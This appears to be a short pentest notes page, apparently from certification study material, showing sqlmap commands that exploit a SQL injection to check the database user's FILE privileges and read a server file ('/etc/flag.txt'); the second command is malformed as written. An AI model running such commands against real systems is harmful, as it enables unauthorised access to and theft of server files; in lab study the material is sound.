sqlmap

Found vulnerability on the server related to SQL injection and want to leverage the attack to get more information. SQLMap provide you with capability to read file if you got privileges

// slqmap has the parameter
confirm the user has 'FILE' privileges to read files
sqlmap -r sql-request -p filter --current-user --privileges

read a file
sqlmap -r --file-read="/etc/flag.txt"

Previousgobuster NexteCPPTv2

Last updated 2 years ago

Was this helpful?